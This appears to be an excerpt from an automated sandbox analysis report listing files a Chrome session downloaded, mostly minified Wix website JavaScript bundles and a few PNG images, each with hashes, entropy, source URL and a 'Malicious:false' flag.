                                                                                                                                                                                                                        SHA-512:41FE00DDA24E5F638F134AB7972E614231D0FA572C2A02C1710E767C60BCCA30A1982931737A95F2B7CD67C3966F84AD0086A0194D1F856EB92CA70080018D02
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[Column_DefaultColumn]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[Column_DefaultColumn]"]=t(require("react")):e["rb_wixui.thunderbolt[Column_DefaultColumn]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(e){var t=e&&e.__esModule?fu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):98646
                                                                                                                                                                                                                        Entropy (8bit):5.340724382044016
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:JZXBGeOGO7l9OeOsOZOiOYO8juy0hzRvEjSucHvSGBV7SqEb7V:dMjzYDJZuy0hzRcHG2qs
                                                                                                                                                                                                                        MD5:52AF04FEFA6DEC50032624DA0190CFFE
                                                                                                                                                                                                                        SHA1:4F7D0F2FBA99AF0DEE90C66FCAEBDCE0E2891FDF
                                                                                                                                                                                                                        SHA-256:53E288E98D3F58506CEF87C0DA96D5891AA6C88A2F08A66B2BC4695DBCA2543F
                                                                                                                                                                                                                        SHA-512:A448FDAF7B7AF7FAC6D31ED34740CB5BBCA4C281AFAB3DAFA69B240B57BE07BE33BB6F421A0C5FC9F1B642A1EB13110AF8E8BDB72077B731EF0B78C7BFFBC963
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_menu",["react","reactDOM"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_menu"]=t(require("react"),require("react-dom")):e["rb_wixui.thunderbolt_menu"]=t(e.React,e.ReactDOM)}("undefined"!=typeof self?self:this,(function(e,t){return function(){var n={39504:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerCloseButton1855956175",{classes:{root:"HamburgerCloseButton1855956175__root"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},15076:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerMenuContainer502174924",{classes:{root:"HamburgerMenuContainer502174924__root"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},35147:function(e,t,n){var r=n(82016);e.exports=r.create("HamburgerOpenButton3651513085",{classes:{root:"HamburgerOpenButton3651513085__root",nav:"Hamb
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14037)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):14156
                                                                                                                                                                                                                        Entropy (8bit):5.31257532830542
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:lfpKf/WgM+2Uj8BrPSSM3QsgcpVuXVtdJp1sJfQ3uGt:l42gMvUj8BrPSn3ucpVuXVtHp1MQ3uGt
                                                                                                                                                                                                                        MD5:2508CB0A2FDF98F9E0771E42FCC78A79
                                                                                                                                                                                                                        SHA1:57C5BC3D16134CAC7682D3705900E38CACBBB0B3
                                                                                                                                                                                                                        SHA-256:0AEE08D46AFDFA6022D5D71D5A657F2163C22D93F0E7975424C898D7FCFF7904
                                                                                                                                                                                                                        SHA-512:D3BF658348BEEDBBCB8805AD0233409BAF7F843DF4206EBAA3FB8CB592860E1FCFAEF87330A1134A943EA777E34B6833042CC37C7BA7D69A7979AA8B6C0C31B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[974],{81220:(t,e,i)=>{i.d(e,{Qf:()=>r,S7:()=>c,T_:()=>o,tn:()=>s,xg:()=>n});const n=t=>-(Math.cos(Math.PI*t)-1)/2,o=t=>t<.5?2*t**2:1-(-2*t+2)**2/2,s=t=>t<.5?(1-Math.sqrt(1-4*t**2))/2:(Math.sqrt(-(2*t-3)*(2*t-1))+1)/2,r={linear:t=>t,sineIn:t=>1-Math.cos(t*Math.PI/2),sineOut:t=>Math.sin(t*Math.PI/2),sineInOut:n,quadIn:t=>t**2,quadOut:t=>1-(1-t)**2,quadInOut:o,cubicIn:t=>t**3,cubicOut:t=>1-(1-t)**3,cubicInOut:t=>t<.5?4*t**3:1-(-2*t+2)**3/2,quartIn:t=>t**4,quartOut:t=>1-(1-t)**4,quartInOut:t=>t<.5?8*t**4:1-(-2*t+2)**4/2,quintIn:t=>t**5,quintOut:t=>1-(1-t)**5,quintInOut:t=>t<.5?16*t**5:1-(-2*t+2)**5/2,expoIn:t=>0===t?0:2**(10*t-10),expoOut:t=>1===t?1:1-2**(-10*t),expoInOut:t=>0===t?0:1===t?1:t<.5?2**(20*t-10)/2:(2-2**(-20*t+10))/2,circIn:t=>1-Math.sqrt(1-t**2),circOut:t=>Math.sqrt(1-(t-1)**2),circInOut:s,backIn:t=>2.70158*t**3-1.70158*t**2,backOut:t=>1+2.70158*(t-1)**3+1.70158*(t-1)**2,ba
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):7846
                                                                                                                                                                                                                        Entropy (8bit):7.598530534985526
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:EmeOSWsTsZkDuX/gzauEMXS2+oMugK8uEvR5aMzwyKrbE6T:EYHsTTDkgQ2+DJ/agMr
                                                                                                                                                                                                                        MD5:F4647F715C3AB6C3C4A247079B88EF93
                                                                                                                                                                                                                        SHA1:56A654F9EC31D4ADCB2106972E1147E05ECE22BC
                                                                                                                                                                                                                        SHA-256:182E3042FDA996F221F9B78813D814322FEC335E45569C2DD66BE1168A457795
                                                                                                                                                                                                                        SHA-512:EC3D1C506CDE33E07DA38F8C8C2F88CDDF828BCCFDB9FBC24EEEB5DB586F6684208C15792E3302CAF10E4650B935EFF9DFA0409219DBC0D36D36152471463B6E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/img/good.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR..............x......gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<...$IDATx.....eWY'.J .B..w ....>.(..tP.....q`$..K.3=..,h..sn...c...q@...EQ$3q.4.H*u..N...j..a.<..I...I.>......GU}....../....{...w.}.35.................................................................................................................................................................................................................................................................fG.....&.[5.w..x_......N.(........:.m..M.k........_..p_.O.U..>57.....On..r..Q..9.>h...{.!./...Sn.[...y.~..7.{..H..\:W...........T5..r....[...M..K9....O....0..z...........%(.{g.....0..W.....o.w../.G..x.)yV.5...2..~0.?....5uq{.;.e.......lh..SG..:.....>...`.......lH.\.;..]~tC?.....s..'..!.l(.o.......f_5..|.....an.wjU.Ou...R.y....:.l..../..j..v....=.vo..f......i.;P.......:e....M..F..7.M...[..}.....uo.=Z7.A..;..j...`.-.._..G7..M.8...@..Q...N..7.w...Y......`.......8,u.....
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35078)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):35199
                                                                                                                                                                                                                        Entropy (8bit):5.3349250548648035
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:bf1ZuXe09MquPjPk3VtABFWDmDYMcqntg7s4zxwoDG:bf7u8PjPu/qWG
                                                                                                                                                                                                                        MD5:0791809290EEE3CB00A08A33E5AE90F3
                                                                                                                                                                                                                        SHA1:E266713144BB39FAF4865B51962C0FCBC98B8B74
                                                                                                                                                                                                                        SHA-256:0AB6FEBE161F23BD6CC9C1F23B5C08AD7F69F2FE0B849CA7BF746863B92CD0BD
                                                                                                                                                                                                                        SHA-512:8666A98BB6497C4C4ED12601F3F7A94CCD8A294C8FE057F92521B4CB5323DA4CE6D5A30AFB4CB81697430C30FCD6230228B28BC042546151A3BC5FD0E82F2A70
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4655],{95667:function(e){var t;"undefined"!=typeof self&&self,t=()=>(()=>{var e={724:function(e,t,n){var r;e.exports=(r=r||function(e,t){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(56)}catch(e){}var o=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(e){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(e){}}throw new Error("Native crypto module could not be used to get secure random number.")},i=Object.create||function(){function e(){}return function(t){var n;return e.prototype=t,n=new e,e.prototype=null,n}}(),a={},c=a.lib={
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (307)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                        Entropy (8bit):5.471235433884373
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:+hfrPS9G3frPS9urigWAA2DFI8V2aHEfLAdw4V6xBUqwDmqGZ7hk+cGyAGDTSgis:+k9Gm9eig9DFIDyqaD7P+hGigiuv
                                                                                                                                                                                                                        MD5:EA9D97FFD7BBAA28A8C1E36592411AF1
                                                                                                                                                                                                                        SHA1:863AB9051B8CBB7709964F02905645D7FD649FE4
                                                                                                                                                                                                                        SHA-256:1EE778F89436B58A0CF5C41659A917CFB927A10558FF736378C4B8F37311845F
                                                                                                                                                                                                                        SHA-512:C74407D558D74F585E835A05D149F41BA5120466D21A46165CA66B59D48FECA9E71E4139D2BB090930F1789CC9AD84675113102E54E0348586BEBCF579D07677
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[1274,6850],{35256:(t,e,n)=>{n.d(e,{Z:()=>r});var p=n(23184);const r=t=>t.react18Compatible&&!a()&&"react-native"!==p.env.RENDERER_BUILD,a=()=>{try{return window.self!==window.top}catch(t){}return!1}}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (572)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):689
                                                                                                                                                                                                                        Entropy (8bit):5.4386301475810175
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:+k9Gm9e5kA273tWfFOx+4+PKm/WRFXoVHvARBUmz2rE5TtClRyB3+hGiglj5:z/k5k15WfFM+PdeRF4VGLzr5T0yB3kgP
                                                                                                                                                                                                                        MD5:A0ECC37AADDBA206911FA5C067B2825B
                                                                                                                                                                                                                        SHA1:4680F416E9A39543B66A68EE76C635EF725805D3
                                                                                                                                                                                                                        SHA-256:A3078B398C315295D7A5B64B9EDE84C4D3C5215E064034F0C50692FC76AAF135
                                                                                                                                                                                                                        SHA-512:BD6ABF6CB882B0AD7D0F2D03C5F33E6083C6AADC2214EEFBA0632972B3D17A797D5C2FD69490DF98AC5F53DB69D4824DEE02E56D9A00A49DD22A59E9CA3CA20F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7265],{33368:(e,t,r)=>{r.r(t),r.d(t,{editorPage:()=>b,page:()=>g});var n=r(20636),o=r(77748);const a=["VerticalMenu"],p="ExpandableMenu",l="DropDownMenu",s="StylableHorizontalMenu";var u=r(71085);const c=(e,t)=>r=>({componentTypes:e,componentWillMount:e=>{const n=r.getFullUrlWithoutQueryParams();e.updateProps({[t]:n})}}),i=(0,o.Og)([u.$1],c([...a,s],"currentPageHref")),_=(0,o.Og)([u.$1],c([p,l],"currentPrimaryPageHref")),g=e=>{e(n.ls).to(i),e(n.ls).to(_)},b=g}}]);.//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js.map
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 86 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1537
                                                                                                                                                                                                                        Entropy (8bit):7.810936663323954
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:Z+9+kRUIwA4b8pBvnkF8hvPin+LxkkcJD:2UVunVZO+AJD
                                                                                                                                                                                                                        MD5:646F1AA3EA056447F8DE3295BD070784
                                                                                                                                                                                                                        SHA1:B7C7464BD8ABDD9A3FA892A65D079C1B79CAF8D1
                                                                                                                                                                                                                        SHA-256:E3A7FA5F9B8F772F856CB84B2526DA49AFA790B2526EEC03AF926B0BA0B08606
                                                                                                                                                                                                                        SHA-512:53A582DC85C0898B2266ACEC66748682B1730906676F648C4CAD5FC02709DE0C744227180CBDE998624DD2F8150581DFA108858CF1C6E460C16259C4189DD8B1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:.PNG........IHDR...V...#.............sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.kL.U....B.......&.!...4....&"...6*E.Mi..".%@".QQ....&.<.T.FA........( B.B.....8.9..f..R6.....g..w>.sgp.$...?v.....B..Z..X.q....G@l......w.`..).*_...}.-.s....F...$._...i...M.6.m.......|.+..p..H.&.-3.}...By.W.).o?.g&6/V.)....@.s..9.X./=Ju>.[y..P.IU'......u...s.........r....Z../s...B.....A.O...".[b@....g =X..o....(O......;.@..f...@...A.m.]...b..A...R5H.....7V-Vw.6..>...0..PZ.Oy..2W...<H[;.HX.X..m...e7..}|].j.@.}...de.|...+.k.[ ...bG.=...Bekv.t.........m......\.;.T...W..j.J........V...}../.../..Il.J...,...n...s.V.0.o..H.U .~.r....\.....s5X.X.f._.~..i......@..\..#..ccX...'.R..iy....L-./r.X....B....P.N.E.....b....;v...,....088..(r.;.............W...@gg'.t.C....L.]]]....ppp |}}...j.......PQXX..........T........Z....).......>......0::.^_YY...7n..[.(niiQ..2..;F.455..***..\]]!<<.:::.|``..G......bRlrr25....UUU.............Ilkk+]..........Jqo.~.m...<....///8~.8..@y..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 406 x 529, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):95611
                                                                                                                                                                                                                        Entropy (8bit):7.98479144957383
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:HpnxBUUsCBVcocWD2nyg3MrO9BIqM52G65v9p7+wmNmVY1EdfwYMKT/gtCo:tUUsOchU2R3MSIq42J9pamddYLyS
                                                                                                                                                                                                                        MD5:68A6D84DAE4D70CA2B1F06749F09A78F
                                                                                                                                                                                                                        SHA1:3084F368844DB89A8C9E41134ECA078E91978A7E
                                                                                                                                                                                                                        SHA-256:73C7607F0C60A4B399446E1018929EA1BBD7D649938D732B95D9521B757E6E4B
                                                                                                                                                                                                                        SHA-512:6B8D5BC56BF5510EA78E5B1CBAF1240286E558AF4DA5F2BDCCC8EA0DD35C8EA2F1329596EFDD994D40E2E1C2E8A9705517B729677877CB22E353A7A4358CFD08
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/img/pf.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR.............i..k....sRGB....... .IDATx^...%U.6..s*....D...b.."I.E...8.. ...=..o...n4.......D......0L.=..............t.L...}O=3O....s...K.Am....B@!...E..,.K.J!..P.(...P...B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!..P..B@!..P..*..Xf.Nu2..B@!...ubY.~.f.X.<..*T*..`6Ms.Z.1$...2.W.H.6o...M....u}.........I.3.X...C..gs<................_......;.......4]k..k.&.?M.0..93..AL.3.L.w...Moz.......-..f."...{....M...... ...z.i<..qF.x..3....Lc....`L..b..3.F...q.(..d...q,.!.K$h....{yB.._...cQ.|.7c.8..<F.....7..,..H...+.;.8..>....M.oz..`..s~O..k..&8.......h.'..q.&L..O.6.x.......@.....M.+=.....U.}..@+.....K.>..=z.d....i\..y.<t.>.6.6.^c..d~..kZGc......`a.sp.Y.q&.@.8x.L'......h.....Q%...a.z...X...}..SL....B`Z.BV..ke..86.....D.....-KF..B../.3.`.....$@d".gck.i}.BO...h....{..~..@...&..fb...S....y..j....$.p........y....pLSa9!qOu..=y,.m..L..............M......`!...~:..$..K.1F..$y..8..8..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):41390
                                                                                                                                                                                                                        Entropy (8bit):5.1864672738087885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:YLX4XfisWcn6M585dqjsJHiq04/VgdhMeZexbuFpnTV8Hcgc1U4ClhdncpCobl3V:YLX4XfisWcn6M585dqjsJHiq04/VgdhX
                                                                                                                                                                                                                        MD5:E171C088607CF01FC09DB32F853FCA64
                                                                                                                                                                                                                        SHA1:81466448AB28B0B9E7522F45068B3AD7E66191E5
                                                                                                                                                                                                                        SHA-256:28B2E3C914F992D81739A1768F3A02B596F8856D3DEBC67C231613058A8FA36B
                                                                                                                                                                                                                        SHA-512:AF3FFD0B90983DFB88F2E2881B672BBFA1844D4F6D311077447BD09647B30BBB5920419B11AE51D3B519EE3F3863D6BBB4EE5E347141E2B97BF9F7E426AA7DF4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.json
                                                                                                                                                                                                                        Preview:{"version":"2.0","host":"thunderbolt","namespace":"wixui","baseURL":"https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/","model":["ce53f34f.bundle.min.js","6f068bf9.min.css"],"assets":[["stylable-metadata","editor-elements-library.thunderbolt.7e2501ca3889a0eda16f5592a6bccb57f1280e09.metadata.json"]],"components":{"AccordionContainer":["cd060e74.bundle.min.js","18ecde03.min.css"],"AccordionItem_Classic":["23232296.bundle.min.js","10f0acaa.min.css"],"AccordionItem_Responsive":["5f700cea.bundle.min.js","34bfed3b.min.css"],"Accordion":["69733d0b.bundle.min.js","b8be6792.min.css"],"AddressInput":["6c549e77.bundle.min.js","02bf2416.min.css"],"AdminLoginButton":["7fee6835.bundle.min.js","418c3247.min.css"],"AppWidget":["aca10667.bundle.min.js","4049eab0.min.css"],"AppWidget_Classic":["5d414cf3.bundle.min.js","4049eab0.min.css"],"AppWidget_Loader":["8b3fbd4e.bundle.min.js","f702e356.min.css"],"AppWidget_Responsive":["c06e1dbd.bundle.min.js","b3b31f6d.min.css"],"A
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13456)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):13630
                                                                                                                                                                                                                        Entropy (8bit):5.339546552423437
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:3H7oQa3MZ57JJKYBv21PfP4Pzq8+k0zmPj1y96NKprTzLV:X7o3K57/KYBuZHEzq8+k0zmPj1y9QKpd
                                                                                                                                                                                                                        MD5:F6C5267469320416D27B21C1469BCE28
                                                                                                                                                                                                                        SHA1:42F845D124694D0A0D2F59D0D5BEBBF84C897BDF
                                                                                                                                                                                                                        SHA-256:7ED3CE515B4EBD41BA60C6A39762740EF82BB13AEB89357E961D29EC540CDC96
                                                                                                                                                                                                                        SHA-512:C3EF082D07FD650418B68C47598EBDA8215D78E02EF496C524A6C8F819A81EB0D3FE3DB08DC19946282E61103CD0E047DD9D5E264E89D3C0335A7EAC290834CD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StylableButton_Default].e479a096.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[StylableButton_Default]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[StylableButton_Default]"]=t(require("react")):e["rb_wixui.thunderbolt[StylableButton_Default]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={27232:function(e,t,n){var a=n(82016);e.exports=a.create("StylableButton2545352419",{classes:{root:"StylableButton2545352419__root",label:"StylableButton2545352419__label",link:"StylableButton2545352419__link",container:"StylableButton2545352419__container",icon:"StylableButton2545352419__icon"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},82016:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.createRenderable=t.create=void 0;t.create=function(e,t,n,a,r,o){const l={namespace:e,classes:t.classes,keyframes:t.keyframes
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9534)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):9582
                                                                                                                                                                                                                        Entropy (8bit):5.310673601453117
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:I5qOMcT/i5hH/A+v7YlISaxwXDt6RjLfGz/hX0XNe3hGJN5AsRJzUAMnGopH4qrz:I5qOM0i5O+v7yIxyXYR/4/10XUxWbRNq
                                                                                                                                                                                                                        MD5:6F1AF620740F6E8D6851E2794BA694D0
                                                                                                                                                                                                                        SHA1:F72E87D87D3C5E4C6F14EC3C6A0C9ADE79E9F3EF
                                                                                                                                                                                                                        SHA-256:CB3F499CCEFF673F0B50D0D61753F88EA1DDFA852EF587B5CEC5E935B431BECA
                                                                                                                                                                                                                        SHA-512:0244450B7750817EAD0122F8074AEF8492598D193B3C60F87EC32645E6639F8175C23AD5041D82110CAFAF2A94FE89C60BFE05E62ABE8509381F001E5EF22F8A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/tag-manager-client/1.920.0/siteTags.bundle.min.js
                                                                                                                                                                                                                        Preview:(()=>{"use strict";const e="Tag Manager: ",t=function(){let e=!1;try{const t=window;e=t&&t.debug||t.location&&(t.location.search||"").toLowerCase().indexOf("debug=")>-1}catch(e){}return e}();function n(n){t&&console&&console.error(`${e} ${n}`)}function o(e){let t=e;try{t=JSON.parse(e)}catch(e){n("Parse error in string"),n(e.message)}return t}function r(e){return o(JSON.stringify(e))}function i(e,t){return!(!e||"true"!==e[t])}const c="_api/tag-manager/api/v1/tags/",a=`${c}sites/`,s=[".wix.com",".editorx.com"],d="22bef345-3c5b-4c18-b782-74d4085112ff",u=!!document.documentMode;function l(e,t,n){let o;u?(o=document.createEvent("CustomEvent"),o.initCustomEvent(e,!0,!0,n)):o=new CustomEvent(e,{detail:n}),t&&t.dispatchEvent&&setTimeout((()=>{t.dispatchEvent(o)}),0)}const f="TagManagerLoaded",g="LoadingTags",p="TagLoaded",m="TagLoadError",h="TagManagerConfigSet";let y=[];const b=[],w=[],E=[];let T,v=[],I={},x=!1;function A(){return E}function C(){return r(I)}function N(e){return Object.keys(e)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65028)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):65196
                                                                                                                                                                                                                        Entropy (8bit):5.511893802728455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:YlRiSZ1W/G+xHD4ymboXtfJjbXUrbTtKVL5:URi21W/GADzmbuAU
                                                                                                                                                                                                                        MD5:23BC9398FE583A0FF53597E69D064A5F
                                                                                                                                                                                                                        SHA1:CA8D7D7EB850622174261BEFCA66B634CE534CAC
                                                                                                                                                                                                                        SHA-256:CAC830DF5F0247623BB73DE4B7B1F0A3C6A13EA259E919CAC9F81F58A87B42B5
                                                                                                                                                                                                                        SHA-512:49C05EB321F654D0194ED67F7968C4618F6D287BE97F4033C0D708890D02464071817B8B5CA76EA141CAB619F84B097826DEE7F4E980F4DEF81F8F4AFB198572
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap-classic",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_bootstrap-classic"]=t(require("react")):e["rb_wixui.thunderbolt_bootstrap-classic"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={96114:function(e,t,a){var n;!function(t){"use strict";var i=function(){},r=t.requestAnimationFrame||t.webkitRequestAnimationFrame||t.mozRequestAnimationFrame||t.msRequestAnimationFrame||function(e){return setTimeout(e,16)};function o(){var e=this;e.reads=[],e.writes=[],e.raf=r.bind(t),i("initialized",e)}function s(e){e.scheduled||(e.scheduled=!0,e.raf(c.bind(null,e)),i("flush scheduled"))}function c(e){i("flush");var t,a=e.writes,n=e.reads;try{i("flushing reads",n.length),e.runTasks(n),i("flushing writes",a.length),e.runTasks(a)}catch(e){t=e}if(e.scheduled=!1,(n.length||
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4137)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5111
                                                                                                                                                                                                                        Entropy (8bit):5.1847068992179715
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:lNYWdo0eDTiGnX2bOvfYnYp+6iXdNJpdU/gIkhEesX:TIYSYYpYN5SeU
                                                                                                                                                                                                                        MD5:738969BB5B17D7C858E9C99E9A4D1D3F
                                                                                                                                                                                                                        SHA1:E1E6ECE0A0D800CF89520F0503B8EC0F2CA4F938
                                                                                                                                                                                                                        SHA-256:338BA38263FA5899495407AC173B768C49C8D398E1D569AA6BEC17D3371B1F8F
                                                                                                                                                                                                                        SHA-512:48A1CDEDD9F515A3869D87B51122AC6FF7FAD3B5A28E3AA94D9EBC64D41559459B56D97220106998E985BABD33FFCD28583C6A9506034212475598C75B885467
                                                                                                                                                                                                                        Malicious:false
